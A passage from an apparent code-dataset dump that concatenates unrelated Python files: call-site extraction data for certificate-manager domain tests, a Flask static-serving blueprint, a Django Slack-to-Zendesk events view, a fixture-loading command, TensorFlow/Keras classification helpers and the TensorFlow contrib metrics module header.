'(client=self.client)\n', (6581, 6601), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((6977, 7038), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'count', 'status': '(200)'}), '(responses.GET, api_url, json=count, status=200)\n', (6990, 7038), False, 'import responses\n'), ((7057, 7083), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (7063, 7083), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((7549, 7624), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.GET, api_url, json=self.error_response, status=400)\n', (7562, 7624), False, 'import responses\n'), ((7643, 7669), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (7649, 7669), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((8105, 8131), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (8111, 8131), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((8437, 8527), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'json': 'self.valid_individual_response', 'status': '(200)'}), '(responses.GET, api_url, json=self.valid_individual_response,\n status=200)\n', (8450, 8527), False, 'import responses\n'), ((8542, 8568), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (8548, 8568), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((9074, 9123), 'responses.add', 'responses.add', (['responses.GET', 'api_url'], {'status': '(404)'}), '(responses.GET, api_url, status=404)\n', (9087, 9123), False, 'import responses\n'), ((9142, 9168), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (9148, 9168), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((9491, 9517), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (9497, 9517), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((10058, 10149), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'headers': "{'Location': location}", 'status': '(201)'}), "(responses.POST, self.api_url, headers={'Location': location},\n status=201)\n", (10071, 10149), False, 'import responses\n'), ((10164, 10190), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (10170, 10190), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((10936, 11027), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'headers': "{'Location': location}", 'status': '(201)'}), "(responses.POST, self.api_url, headers={'Location': location},\n status=201)\n", (10949, 11027), False, 'import responses\n'), ((11042, 11068), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (11048, 11068), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((11754, 11839), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'json': 'self.error_response', 'status': '(400)'}), '(responses.POST, self.api_url, json=self.error_response,\n status=400)\n', (11767, 11839), False, 'import responses\n'), ((11876, 11902), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (11882, 11902), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((12437, 12522), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'json': 'self.error_response', 'status': '(200)'}), '(responses.POST, self.api_url, json=self.error_response,\n status=200)\n', (12450, 12522), False, 'import responses\n'), ((12559, 12585), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (12565, 12585), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((13139, 13194), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'status': '(201)'}), '(responses.POST, self.api_url, status=201)\n', (13152, 13194), False, 'import responses\n'), ((13213, 13239), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (13219, 13239), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((13790, 13884), 'responses.add', 'responses.add', (['responses.POST', 'self.api_url'], {'headers': "{'Location': 'not a url'}", 'status': '(201)'}), "(responses.POST, self.api_url, headers={'Location':\n 'not a url'}, status=201)\n", (13803, 13884), False, 'import responses\n'), ((13899, 13925), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (13905, 13925), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((14410, 14436), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (14416, 14436), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((14774, 14826), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(200)'}), '(responses.DELETE, api_url, status=200)\n', (14787, 14826), False, 'import responses\n'), ((14845, 14871), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (14851, 14871), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((15266, 15318), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(404)'}), '(responses.DELETE, api_url, status=404)\n', (15279, 15318), False, 'import responses\n'), ((15337, 15363), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (15343, 15363), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((15694, 15720), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (15700, 15720), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((16073, 16122), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(200)'}), '(responses.PUT, api_url, status=200)\n', (16086, 16122), False, 'import responses\n'), ((16141, 16167), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (16147, 16167), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((16575, 16624), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(404)'}), '(responses.PUT, api_url, status=404)\n', (16588, 16624), False, 'import responses\n'), ((16643, 16669), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (16649, 16669), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((17000, 17026), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (17006, 17026), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((17376, 17425), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(200)'}), '(responses.PUT, api_url, status=200)\n', (17389, 17425), False, 'import responses\n'), ((17444, 17470), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (17450, 17470), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((17877, 17926), 'responses.add', 'responses.add', (['responses.PUT', 'api_url'], {'status': '(404)'}), '(responses.PUT, api_url, status=404)\n', (17890, 17926), False, 'import responses\n'), ((17945, 17971), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (17951, 17971), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((18303, 18329), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (18309, 18329), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((18730, 18780), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(200)'}), '(responses.POST, api_url, status=200)\n', (18743, 18780), False, 'import responses\n'), ((18799, 18825), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (18805, 18825), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((19460, 19510), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(404)'}), '(responses.POST, api_url, status=404)\n', (19473, 19510), False, 'import responses\n'), ((19529, 19555), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (19535, 19555), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((19920, 19946), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (19926, 19946), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((20373, 20425), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(200)'}), '(responses.DELETE, api_url, status=200)\n', (20386, 20425), False, 'import responses\n'), ((20444, 20470), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (20450, 20470), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((21131, 21183), 'responses.add', 'responses.add', (['responses.DELETE', 'api_url'], {'status': '(404)'}), '(responses.DELETE, api_url, status=404)\n', (21144, 21183), False, 'import responses\n'), ((21202, 21228), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (21208, 21228), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((21604, 21630), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (21610, 21630), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((22033, 22083), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(200)'}), '(responses.POST, api_url, status=200)\n', (22046, 22083), False, 'import responses\n'), ((22102, 22128), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (22108, 22128), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((22717, 22767), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(404)'}), '(responses.POST, api_url, status=404)\n', (22730, 22767), False, 'import responses\n'), ((22786, 22812), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (22792, 22812), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((23180, 23206), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (23186, 23206), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((23607, 23657), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(200)'}), '(responses.POST, api_url, status=200)\n', (23620, 23657), False, 'import responses\n'), ((23676, 23702), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (23682, 23702), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((24288, 24338), 'responses.add', 'responses.add', (['responses.POST', 'api_url'], {'status': '(404)'}), '(responses.POST, api_url, status=404)\n', (24301, 24338), False, 'import responses\n'), ((24357, 24383), 'cert_manager.domain.Domain', 'Domain', ([], {'client': 'self.client'}), '(client=self.client)\n', (24363, 24383), False, 'from cert_manager.domain import Domain, DomainCreationResponseError\n'), ((10511, 10532), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (10521, 10532), False, 'import json\n'), ((11472, 11493), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (11482, 11493), False, 'import json\n'), ((19079, 19100), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (19089, 19100), False, 'import json\n'), ((20733, 20754), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (20743, 20754), False, 'import json\n'), ((22354, 22375), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (22364, 22375), False, 'import json\n'), ((23927, 23948), 'json.dumps', 'json.dumps', (['post_data'], {}), '(post_data)\n', (23937, 23948), False, 'import json\n')] |
from flask import Blueprint, Flask, send_from_directory
from werkzeug.security import check_password_hash, generate_password_hash
from app import db
from app.mod_auth.forms import LoginForm
from app.mod_auth.models import User
mod_ecomm = Blueprint('products', __name__, url_prefix='/products',
static_folder='../../frontend/build')
@mod_ecomm.route("/", defaults={'path': ''})
def serve(path):
if path:
return send_from_directory(mod_ecomm.static_folder, path)
else:
return send_from_directory(mod_ecomm.static_folder, 'index.html')
| [
"flask.Blueprint",
"flask.send_from_directory"
]
| [((248, 346), 'flask.Blueprint', 'Blueprint', (['"""products"""', '__name__'], {'url_prefix': '"""/products"""', 'static_folder': '"""../../frontend/build"""'}), "('products', __name__, url_prefix='/products', static_folder=\n '../../frontend/build')\n", (257, 346), False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((463, 513), 'flask.send_from_directory', 'send_from_directory', (['mod_ecomm.static_folder', 'path'], {}), '(mod_ecomm.static_folder, path)\n', (482, 513), False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((541, 599), 'flask.send_from_directory', 'send_from_directory', (['mod_ecomm.static_folder', '"""index.html"""'], {}), "(mod_ecomm.static_folder, 'index.html')\n", (560, 599), False, 'from flask import Blueprint, Flask, send_from_directory\n')] |
import pprint
import logging
from django.conf import settings
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response
from zenslackchat.message import handler
from zenslackchat.models import SlackApp
from zenslackchat.models import ZendeskApp
class Events(APIView):
"""Handle Events using the webapp instead of using the RTM API.
This is handy as i don't need to run a specifc bot process just to handle
events. Instead I can just using the webapp REST API for this.
Handy documentation for Slack events: https://api.slack.com/events-api
The app needs to subscribe to events to receive them. From
https://api.slack.com/apps/<APP ID>/event-subscriptions you need to:
- Enable Events from "Off" to "On"
- Enter the "Request URL" e.g.: http://<instance id>.ngrok.io/slack/events/
- Then "Subscribe to events on behalf of users"
- Click "Add Workspace Event" and add "message.channels".
Message on channels will now start being recieved. The bot will need to be
invited to a channel first.
"""
def post(self, request, *args, **kwargs):
"""Events will come in over a POST request.
"""
log = logging.getLogger(__name__)
slack_message = request.data
if slack_message.get('token') != settings.SLACK_VERIFICATION_TOKEN:
log.error("Slack message verification failed!")
return Response(status=status.HTTP_403_FORBIDDEN)
# verification challenge, convert to signature verification instead:
if slack_message.get('type') == 'url_verification':
return Response(data=slack_message, status=status.HTTP_200_OK)
if 'event' in slack_message:
event = slack_message.get('event')
if settings.DEBUG:
log.debug(f'event received:\n{pprint.pformat(event)}\n')
try:
handler(
event,
our_channel=settings.SRE_SUPPORT_CHANNEL,
slack_client=SlackApp.client(),
zendesk_client=ZendeskApp.client(),
workspace_uri=settings.SLACK_WORKSPACE_URI,
zendesk_uri=settings.ZENDESK_TICKET_URI,
user_id=settings.ZENDESK_USER_ID,
group_id=settings.ZENDESK_GROUP_ID,
)
except: # noqa
# I want all event even if they cause me problems. If I don't
# accept the webhook will be marked as broken and then no more
# events will be sent.
log.exception("Slack message_handler error: ")
return Response(status=status.HTTP_200_OK)
| [
"logging.getLogger",
"pprint.pformat",
"zenslackchat.models.ZendeskApp.client",
"zenslackchat.models.SlackApp.client",
"rest_framework.response.Response"
]
| [((1240, 1267), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1257, 1267), False, 'import logging\n'), ((2703, 2738), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_200_OK'}), '(status=status.HTTP_200_OK)\n', (2711, 2738), False, 'from rest_framework.response import Response\n'), ((1462, 1504), 'rest_framework.response.Response', 'Response', ([], {'status': 'status.HTTP_403_FORBIDDEN'}), '(status=status.HTTP_403_FORBIDDEN)\n', (1470, 1504), False, 'from rest_framework.response import Response\n'), ((1662, 1717), 'rest_framework.response.Response', 'Response', ([], {'data': 'slack_message', 'status': 'status.HTTP_200_OK'}), '(data=slack_message, status=status.HTTP_200_OK)\n', (1670, 1717), False, 'from rest_framework.response import Response\n'), ((2071, 2088), 'zenslackchat.models.SlackApp.client', 'SlackApp.client', ([], {}), '()\n', (2086, 2088), False, 'from zenslackchat.models import SlackApp\n'), ((2125, 2144), 'zenslackchat.models.ZendeskApp.client', 'ZendeskApp.client', ([], {}), '()\n', (2142, 2144), False, 'from zenslackchat.models import ZendeskApp\n'), ((1880, 1901), 'pprint.pformat', 'pprint.pformat', (['event'], {}), '(event)\n', (1894, 1901), False, 'import pprint\n')] |
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
from os import path
class Command(BaseCommand):
help = "Populates data"
def handle(self, *args, **options):
fixture_path = path.join(path.dirname(
path.dirname(
path.dirname(
path.abspath(__file__)
)
)
), "fixtures/")
settings.FIXTURE_DIRS = (fixture_path,)
call_command("loaddata", "country", verbosity=1)
| [
"os.path.abspath",
"django.core.management.call_command"
]
| [((510, 558), 'django.core.management.call_command', 'call_command', (['"""loaddata"""', '"""country"""'], {'verbosity': '(1)'}), "('loaddata', 'country', verbosity=1)\n", (522, 558), False, 'from django.core.management import call_command\n'), ((375, 397), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (387, 397), False, 'from os import path\n')] |
import tensorflow as tf
@tf.function
def BinaryAccuracy_Infiltrates(y_true, y_pred, i=0):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Pneumonia(y_true, y_pred, i=1):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Covid19(y_true, y_pred, i=2):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
@tf.function
def BinaryAccuracy_Normal(y_true, y_pred, i=3):
return tf.keras.metrics.binary_accuracy(y_true[:, i], y_pred[:, i])
class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.wait_epoch_warmup = kwargs.get("wait_epoch_warmup")
def on_epoch_end(self, epoch, logs=None):
if self.wait_epoch_warmup:
if (epoch + 1) >= self.wait_epoch_warmup:
super().on_epoch_end(epoch, logs)
else:
self.epochs_since_last_save += 1
print(f"Skipping save model (wait_epoch_warmup={self.wait_epoch_warmup - (epoch + 1)})")
else:
super().on_epoch_end(epoch, logs)
class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping):
def __init__(self, *args, **kwargs):
self.minimum_epochs = kwargs.get("minimum_epochs", 0)
kwargs.pop('minimum_epochs', None) # Problems with EarlyStopping kwargs
super().__init__(*args, **kwargs)
def on_epoch_end(self, epoch, logs=None):
if epoch >= self.minimum_epochs:
super().on_epoch_end(epoch, logs)
def get_losses():
losses = [tf.keras.losses.BinaryCrossentropy()]
return losses
def get_metrics(single_output_idx, add_normal=False):
metrics = []
if single_output_idx is None: # Multi-label
print("###### Multi-label classification ######")
metrics += [
BinaryAccuracy_Infiltrates,
BinaryAccuracy_Pneumonia,
BinaryAccuracy_Covid19
]
# Add normal class
if add_normal:
metrics.append(BinaryAccuracy_Normal)
else:
print(f"###### Multi-class classification (cls: '{single_output_idx}') ######")
metrics = [
tf.keras.metrics.BinaryAccuracy(),
tf.keras.metrics.AUC(),
tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()
]
return metrics
def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None):
istrainable = not freeze_base_model
# Select backbone
if backbone == "resnet50":
from tensorflow.keras.applications.resnet import ResNet50 as TFModel
from tensorflow.keras.applications.resnet import preprocess_input
elif backbone == "resnet50v2":
from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "resnet101v2":
from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel
from tensorflow.keras.applications.resnet_v2 import preprocess_input
elif backbone == "vgg16":
from tensorflow.keras.applications.vgg16 import VGG16 as TFModel
from tensorflow.keras.applications.vgg16 import preprocess_input
elif backbone == "efficientnetb0":
from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
elif backbone == "efficientnetb7":
from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel
from tensorflow.keras.applications.efficientnet import preprocess_input
else:
raise ValueError(f"Unknown backbone: {backbone}")
if ignore_model:
model = None
else:
# Instantiate base model with pre-trained weights
base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet")
# Freeze base model
# base_model.trainable = istrainable
for layers in base_model.layers:
layers.trainable = istrainable
# Create a new model on top
inputs = base_model.input
x = base_model(inputs)
# Option A
x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)
# Option B
# x = tf.keras.layers.Flatten(name='flatten')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x)
# x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x)
# Outputs
outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x)
model = tf.keras.Model(inputs, outputs)
return model, preprocess_input
def add_tabular_input(model, classes):
# Input1
input1 = model.input
input2 = tf.keras.layers.Input(shape=(2,), name="input_2b")
# Pre-outputs 1x3 + 1x3
output1 = model.output
output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2)
# Outputs
x = tf.keras.layers.Concatenate(axis=1)([output1, output2])
output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x)
model = tf.keras.Model([input1, input2], output)
return model
def unfreeze_base_model(model, n=None, unfreeze=True):
base_model = model.layers[1].layers
# Select number of layers to unfreeze
idx = 0
if n is not None:
if isinstance(n, int):
idx = n
print(f"Unfreezing {len(base_model) - idx} layers")
elif isinstance(n, float) and 0.0 < n <= 1.0:
idx = int(len(base_model) * n)
print(f"Unfreezing {idx} layers")
else:
raise ValueError("Invalid number of layers")
# We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights)
for layer in base_model[-idx:]:
if not isinstance(layer, tf.keras.layers.BatchNormalization):
layer.trainable = True
| [
"tensorflow.keras.metrics.BinaryAccuracy",
"tensorflow.keras.layers.Input",
"tensorflow.keras.applications.efficientnet.EfficientNetB7",
"tensorflow.keras.layers.Concatenate",
"tensorflow.keras.losses.BinaryCrossentropy",
"tensorflow.keras.metrics.Precision",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.metrics.AUC",
"tensorflow.keras.Model",
"tensorflow.keras.metrics.Recall",
"tensorflow.keras.layers.GlobalAveragePooling2D",
"tensorflow.keras.metrics.binary_accuracy"
]
| [((103, 163), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (135, 163), True, 'import tensorflow as tf\n'), ((241, 301), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (273, 301), True, 'import tensorflow as tf\n'), ((377, 437), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (409, 437), True, 'import tensorflow as tf\n'), ((512, 572), 'tensorflow.keras.metrics.binary_accuracy', 'tf.keras.metrics.binary_accuracy', (['y_true[:, i]', 'y_pred[:, i]'], {}), '(y_true[:, i], y_pred[:, i])\n', (544, 572), True, 'import tensorflow as tf\n'), ((4929, 4979), 'tensorflow.keras.layers.Input', 'tf.keras.layers.Input', ([], {'shape': '(2,)', 'name': '"""input_2b"""'}), "(shape=(2,), name='input_2b')\n", (4950, 4979), True, 'import tensorflow as tf\n'), ((5316, 5356), 'tensorflow.keras.Model', 'tf.keras.Model', (['[input1, input2]', 'output'], {}), '([input1, input2], output)\n', (5330, 5356), True, 'import tensorflow as tf\n'), ((1664, 1700), 'tensorflow.keras.losses.BinaryCrossentropy', 'tf.keras.losses.BinaryCrossentropy', ([], {}), '()\n', (1698, 1700), True, 'import tensorflow as tf\n'), ((3984, 4061), 'tensorflow.keras.applications.efficientnet.EfficientNetB7', 'TFModel', ([], {'input_shape': '(*target_size, 3)', 'include_top': '(False)', 'weights': '"""imagenet"""'}), "(input_shape=(*target_size, 3), include_top=False, weights='imagenet')\n", (3991, 4061), True, 'from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel\n'), ((4769, 4800), 'tensorflow.keras.Model', 'tf.keras.Model', (['inputs', 'outputs'], {}), '(inputs, outputs)\n', (4783, 4800), True, 'import tensorflow as tf\n'), ((5050, 5121), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['classes'], {'activation': '"""sigmoid"""', 'name': '"""output_tab"""'}), "(classes, activation='sigmoid', name='output_tab')\n", (5071, 5121), True, 'import tensorflow as tf\n'), ((5153, 5188), 'tensorflow.keras.layers.Concatenate', 'tf.keras.layers.Concatenate', ([], {'axis': '(1)'}), '(axis=1)\n', (5180, 5188), True, 'import tensorflow as tf\n'), ((5222, 5300), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['classes'], {'activation': '"""sigmoid"""', 'name': '"""final_predictions"""'}), "(classes, activation='sigmoid', name='final_predictions')\n", (5243, 5300), True, 'import tensorflow as tf\n'), ((2275, 2308), 'tensorflow.keras.metrics.BinaryAccuracy', 'tf.keras.metrics.BinaryAccuracy', ([], {}), '()\n', (2306, 2308), True, 'import tensorflow as tf\n'), ((2322, 2344), 'tensorflow.keras.metrics.AUC', 'tf.keras.metrics.AUC', ([], {}), '()\n', (2342, 2344), True, 'import tensorflow as tf\n'), ((2358, 2386), 'tensorflow.keras.metrics.Precision', 'tf.keras.metrics.Precision', ([], {}), '()\n', (2384, 2386), True, 'import tensorflow as tf\n'), ((2400, 2425), 'tensorflow.keras.metrics.Recall', 'tf.keras.metrics.Recall', ([], {}), '()\n', (2423, 2425), True, 'import tensorflow as tf\n'), ((4354, 4409), 'tensorflow.keras.layers.GlobalAveragePooling2D', 'tf.keras.layers.GlobalAveragePooling2D', ([], {'name': '"""avg_pool"""'}), "(name='avg_pool')\n", (4392, 4409), True, 'import tensorflow as tf\n'), ((4677, 4749), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['classes'], {'activation': '"""sigmoid"""', 'name': '"""predictions"""'}), "(classes, activation='sigmoid', name='predictions')\n", (4698, 4749), True, 'import tensorflow as tf\n')] |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for evaluation metrics and summary statistics.
See the @{$python/contrib.metrics} guide.
@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_recall_at_thresholds
@@streaming_precision
@@streaming_precision_at_thresholds
@@streaming_auc
@@streaming_curve_points
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_mean_tensor
@@streaming_root_mean_squared_error
@@streaming_covariance
@@streaming_pearson_correlation
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_average_precision_at_k
@@streaming_sparse_average_precision_at_top_k
@@streaming_sparse_precision_at_k
@@streaming_sparse_precision_at_top_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@streaming_concat
@@streaming_false_negatives
@@streaming_false_negatives_at_thresholds
@@streaming_false_positives
@@streaming_false_positives_at_thresholds
@@streaming_true_negatives
@@streaming_true_negatives_at_thresholds
@@streaming_true_positives
@@streaming_true_positives_at_thresholds
@@auc_using_histogram
@@accuracy
@@aggregate_metrics
@@aggregate_metric_map
@@confusion_matrix
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
# pylint: enable=wildcard-import
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
